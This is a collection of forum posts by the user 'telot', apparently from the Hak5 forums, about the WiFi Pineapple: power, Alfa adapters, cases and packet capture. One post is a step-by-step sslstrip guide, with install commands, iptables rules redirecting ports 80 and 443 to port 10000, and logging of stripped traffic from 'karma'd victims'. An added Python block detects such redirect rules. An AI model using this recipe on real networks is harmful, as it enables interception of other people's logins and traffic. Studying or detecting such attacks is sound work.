
Posts posted by telot

  1. Yes I confirm the issue, seems that some random Alfas out there have a faulty internal RP-SMA connector or however that was my case.. Regarding that here's the topic you are looking for http://forums.hak5.org/index.php?showtopic=26089&st=0&p=199567entry199567

    Well it's good news you isolated the problem and found a remedy - well done ptrac3! We should def keep this in mind for the once every month or two question about this :)

    telot

  2. Yes it is absolutely possible. There are pros and cons to some various techniques, but we'll start with your questions, then get to the guts of the issue.

    - Does it go into monitor mode (not simply promiscuous mode)?

    Yes you can do this

    - Does it support capturing to some form of mass storage (USB drive would be fine)?

    Yep!

    - If monitor mode is supported, is it supported on the internal Wi-Fi chip, or only on a USB Wi-Fi adapter?

    Internal or external or both! (more on that in a minute)

    - Does the Pineapple support the ALFA AWUS036H, or only the AWUS036NHA in the HakShop?

    Newest firmware supports both!

    - Is a USB battery pack sufficient to power the Pineapple, USB Wi-Fi card (e.g. an ALFA) and USB storage drive combined?

    Depends on the battery pack :)

    Now - you can hook up a usb stick to your pineapple, follow the instructions on these forums to set up some of it to be a swap partition for the fruit, and the rest mass storage. Then run airmon-ng stop mon.wlan0 and airmon-ng start wlan0. You can then install tcpdump and run tcpdump -i mon0 -w /usb/cap.pcap -n net 172.16.42.0/24 & - you'll then be saving every packet on the channel that mon0 is set to. The major downside to this method is you can no longer karma anyone, as you've removed the pineapple's ability to sniff out probe requests.

    Your other option is to not have a usb stick, and instead have your AWUS036x card plugged in. Now you can airmon-ng start the new wlan and capture all the packets and still karma all the kids to your pineapple (it's also a great way to do deauths, including airdropping!). The downside to this of course is you have no place to store all the caps. Now, you can either get an independently powered usb hub and try it that way (I've never attempted this - I think it's gotten mixed results) OR find some way of piping the capture files to a server. I tried to set up sshfs and failed miserably, but we've gotten samba working this week and that is my brightest hope for the moment. Unfortunately I haven't the time this weekend to test it out, but if you're up for it, do eet!

    Hope this helps

    telot

  3. This looks awesome wiregr! I've been trying to get sshfs working on the pineapple to no avail, but this is the next best thing! I want to use the alfa awus036nha that I got from the hakshop, which makes it impossible to use the usb drive for storage of my tcpdumps. I'll try and play around with using samba for storage of the caps instead of sshfs! Thanks!

    telot

  4. A few of us over on the netstumbler forums did this with linksys wrt-54g's. One of the moderators put a few in taxi cabs and let them wardrive for him. I think his brother ran the company or something. Someone else, I think it was Mother, modded his with a 3g radio, this was before every phone had internet access, or at least mostly cheap internet access. I might have to pull my serial gps out of my 54g and add it to my pineapple.... :unsure:

    That sounds like an awesome project barry! Do eet up!

    telot

  5. Pineapple fleet management...I like this! For a wide scale deployment (multiple units) - you could easily see on a google-maps like interface where your pineapple is, and maybe do a hover-over or clickable icon to see its last communication? That way you can monitor its uptime and so-on! Not a bad idea billius!

    telot

  6. Short answer, it'll be awesome dude. Long answer is long...

    Let me preface this with a big fat WARNING!!!!! The following advice only pertains to those who have two SEPARATE batteries or usb ports or whatever. Doing the following on one computer with multiple usb ports will be VERY BAD for your computer.

    With that out of the way, to more fully answer your question, it depends on how you wire the Y cable.

    If it's in series (taking the + and putting it to the - of each usb port) then you will double the voltage (from 5V to 10V) which will (via Ohm's law) thereby reduce the amount of amps you're pulling. In lay terms, that means your batteries will last twice as long (booya!).

    Wiring the Y cable in parallel, you will have double the capacity (amp/hours) but the same voltage...5V.

    See this diagram for a visual explanation: http://www.zbattery.com/core/media/media.nl?id=7097&c=288557&h=dfa0e19a839ae9849759

    Either way, it's full of awesome as long as, once again - you're doing this with TWO SEPARATE POWER SOURCES. Have fun!

    Also, has anyone actually had fried pineapples? I wonder if it's good...

    telot

  7. Interesting :) My module does not redirect the 443 to 10000, only the 80 and beta testers reported it as working.

    TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem. I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 442 dealio, but it works, so who's complaining? :)

    telot

  8. $284 gives you quite a lot of bang for your buck! That price is quite impressive really. Not that the mark4 is underpowered by any means, but like you said, if you could get this thing in a populated enough area, hundreds of clients could be handled without problems I'm guessing...intriguing!

    Has anyone here had more than 50 clients simultaneously connected to the mark4? I'd be interested in knowing what the upper limit is

    telot

  9. Hi Telot

    Why would this be necessary? This is ssl traffic and can't be decrypted:

    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

    Also I am having a problem with direction

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    It seems that only the traffic from browsing the pineapples interface gets redirected to port 10000, not the traffic going through the router.

    Unfortunately I don't know enough about IP tables to fix this problem.

    Any help would be appreciated.

    Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used?

    I honestly can't explain - I'm just a meager pragmatist. It works for me (for all traffic, including karma'd victims) so I thought I'd share.

    telot

  10. Have you looked at the Macbook Air? You mentioned that portability is a primary concern of yours, and with the latest refresh with ivy bridge, they're certainly plenty powerful. I myself have an i7 8gb of ram on order at the moment :) Just a thought

    telot

  11. Ok - there's never been a straight up "How to get sslstrip working" thread - there's quite a few bits and pieces and there's always WM's module...but people still seem to be confused. I aim to put a stop to this via this here guide.

    1. Install sslstrip:

    opkg update

    opkg install --dest usb sslstrip

    Note: I install everything to my usb. If you don't have a USB drive, then the command will look like this: opkg install sslstrip (herpaderp)

    2. One time configuration of sslstrip:

    A HUGE thanks to Vulture for laying this out for us:

    ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7

    touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

    3. iptables configuration - must be run each and every time the pineapple reboots BEFORE you want to run sslstrip.

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

    4. run sslstrip!

    sslstrip -w /usb/sslstrip.log &

    Done! sslstrip is now running in the background! I usually combo this with a little tcpdump - that way you've got every plaintext and ssl'd packet! Hope you all enjoy

    telot
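
An added example, not part of telot's post or of the Pineapple firmware: on a Linux gateway you administer, rules like the two in step 3 appear in the nat table, and this Python check flags them in `iptables -t nat -S` output (which prints `--dport` for `--destination-port`). The sample ruleset, `find_web_redirects` and `option_value` are constructed for illustration.

```python
import shlex

WEB_PORTS = {"80", "443"}  # the two ports matched by the rules in step 3

# Constructed sample in `iptables -t nat -S` format (not from a real device).
SAMPLE_RULES = """\
-P PREROUTING ACCEPT
-P POSTROUTING ACCEPT
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000
-A PREROUTING -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 10000
-A PREROUTING -i br-lan -p tcp -m tcp --dport 8080 -j REDIRECT --to-ports 3128
-A PREROUTING -p udp -m udp --dport 53 -j REDIRECT --to-ports 53
-A POSTROUTING -o eth0 -j MASQUERADE
"""


def option_value(tokens, *names):
    """Return the argument following the first matching option, or None."""
    for i, tok in enumerate(tokens[:-1]):
        if tok in names:
            return tokens[i + 1]
    return None


def find_web_redirects(rules_text):
    """Return (dport, to_port, rule) for every PREROUTING rule that REDIRECTs
    TCP traffic bound for port 80 or 443 to a listener on the gateway itself."""
    findings = []
    for line in rules_text.splitlines():
        tokens = shlex.split(line)
        if option_value(tokens, "-A", "--append") != "PREROUTING":
            continue
        if option_value(tokens, "-j", "--jump") != "REDIRECT":
            continue
        if option_value(tokens, "-p", "--protocol") != "tcp":
            continue
        # Single-port and multiport (comma-separated) match forms.
        dports = option_value(tokens, "--dport", "--destination-port",
                              "--dports", "--destination-ports") or ""
        to_port = option_value(tokens, "--to-ports")
        for port in dports.split(","):
            if port in WEB_PORTS:
                findings.append((int(port), to_port, line.strip()))
    return findings


if __name__ == "__main__":
    for dport, to_port, rule in find_web_redirects(SAMPLE_RULES):
        print(f"tcp/{dport} redirected to local port {to_port}: {rule}")
```
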

  12. Many true hackers have tried to do their part in showing the difference between hackers and criminals by doing things like writing papers and making videos. Unfortunately your average john doe won't likely be interested in just randomly finding out what a hacker is for himself. In the end, many of these papers only preach to the choir. If you wanted to quickly end the criminal stereotype you would have to mass broadcast a message that would reach Mr and Mrs Doe. Hollywood prefers to make the hacker the criminal in the story and it is very unlikely they will make a movie where a hacker is the hero. Maybe they could sell it as a MacGyver spin off. The quickest way would be to take over and broadcast a message on all networks possible which would be a ... crime. The only other way I can think of that could end the stereotype is a change in the education systems.

    tl;dr: It is a nice paper, but the people who need to, likely won't read it.

    I think there's a lot of Hollywood media with hackers as the good guys...

    http://www.rebootfilm.com/

    http://www.imdb.com/title/tt0113243/

    http://en.wikipedia.org/wiki/Breaking_In_(TV_series)

    http://www.imdb.com/title/tt0105435/

    telot

  13. Even more cool...is Darren now using a MAC?! Has Paul brought you over to the dark side (the cool side imho)?

    Kidding aside, this looks like a great addition to the pineapple - I think bringing more and more metasploit into the fold only bolsters the pineapple's e-rep - a lot of folks in the community nowadays look on wifi hacks as almost passé. This kind of metasploit integration will lend credence to the fact that wifi is a great attack vector and very much worth not looking over. Thanks Darren!

    telot

  14. I have not tried it, but there have been rumblings about alfa cards wanting more juice than the pineapple can give which causes the card to just stop after a bit. People have thwarted this by supplying 12V to the pineapple (as opposed to 5V from powering via USB) and/or bringing down the tx power of the alfa card with iwconfig wlan1 T 10 or something. I believe that was referring to the 036NHA, not the old 036H, so you might have better luck...either way report back your results so we can all learn!

    telot

  15. I'm going to build something around this. There's enough room for a power supply battery too.

    0082603001359_500X500.jpg

    I picked it up at Walmart for under $9. Its actually a hypodermic case for people with diabetes.

    diabeetus.jpg

    Bleh! Demonic Wilford is NOT something you want to wake up to...

    I like the case - how much of that is metal vs shiny plastic? I imagine for 9 bucks it's mostly plastic - but if there's lots of metal you may get some interference.

    telot

  16. Yep I have extensively. The old Mark3 would definitely overheat (see my/others fan-mod posts if you have a mark3) even without an enclosure if you were...let's say "intensively" using it. The mark4 seems to be cool as a cucumber, though I guess I'm not sure what 3G solution you're using (if any) - that could add some heat. In general though, if you have a mark4 - heat is no problem.

    telot

  17. Pour beer in a glass and give it to me.

    I've never played with Windows 8, but from what little I know, they haven't changed the networking too much. Though it may be accessed from a different spot, you should still be able to get into your ethernet adapter (Local Area Connection) and assign a static IP, same as always. I can't imagine they'd leave that out of the developer preview. Once you get into your adapter's settings, the instructions should be the same (ip: 172.16.42.42, subnet 255.255.255.0 - turn on ICS, etc)

    Let us know how it goes! There is no tutorial/how-to yet, so it'd be great if you could write one up!

    telot

  18. === UPDATE ===

    I spoke too soon: at 18 dBm it disassociated after about 30min. I tried 16 and it immediately disconnected with the DHCP request. I am now at 14 dBm. I will see how this goes.

    Please keep us updated regarding this. The topic is near and dear to my heart and I'm very curious how it pans out, as the same thing is happening with my raspberry pi (too much draw). I'll add any data I gather as well. Thanks digitaladdictions!

    telot

  19. Very interesting idea - hide the fact you're rocking a pineapple by obfuscating the /www directory...I guess I've never thought I'd ever run into anyone who knows what a pineapple is, let alone how to exploit it. But as the hacker con season is coming up, perhaps this would be a good addition to the new "stealth mode" pineapple features.

    telot
